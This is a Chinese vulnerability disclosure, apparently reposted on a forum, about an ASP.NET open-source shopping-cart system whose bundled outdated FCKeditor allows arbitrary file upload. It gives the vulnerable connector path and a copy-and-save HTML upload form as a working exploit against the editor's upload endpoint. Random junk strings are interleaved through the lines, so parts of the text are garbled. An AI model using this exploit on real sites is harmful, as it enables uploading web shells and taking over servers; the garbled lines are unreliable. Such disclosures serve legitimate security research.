披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
- ?7 k* t/ q8 v2 E, k 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开0 B& b$ x* b' b; ~. }
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。$ _. H1 e) b2 r* \. L0 |# {+ l
详细说明:其他版本我没测试,估计也是一样的问题
; E: d7 h4 h' K1 b! W F+ ?0 [ http://127.0.0.1/controls/fckedi ... aspx/connector.aspx
, [; B8 I! q1 G! }" v3 K 跳转到网站根目录上传任意文件。
C: \% R5 B6 ^1 i, p& ?8 q 漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
& l2 J" W0 E- ] <form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
+ C% o$ ^: `0 W1 ~0 L Upload a new file:<br>
' r8 k- V( d1 O Z <input type="file" name="NewFile" size="50"><br>
$ K$ y" r2 V8 H8 k: W <input id="btnUpload" type="submit" value="Upload">
q9 k+ A: x8 c- W/ m, z </form> |
发表于 2012-9-10 20:46:29
收藏
支持
反对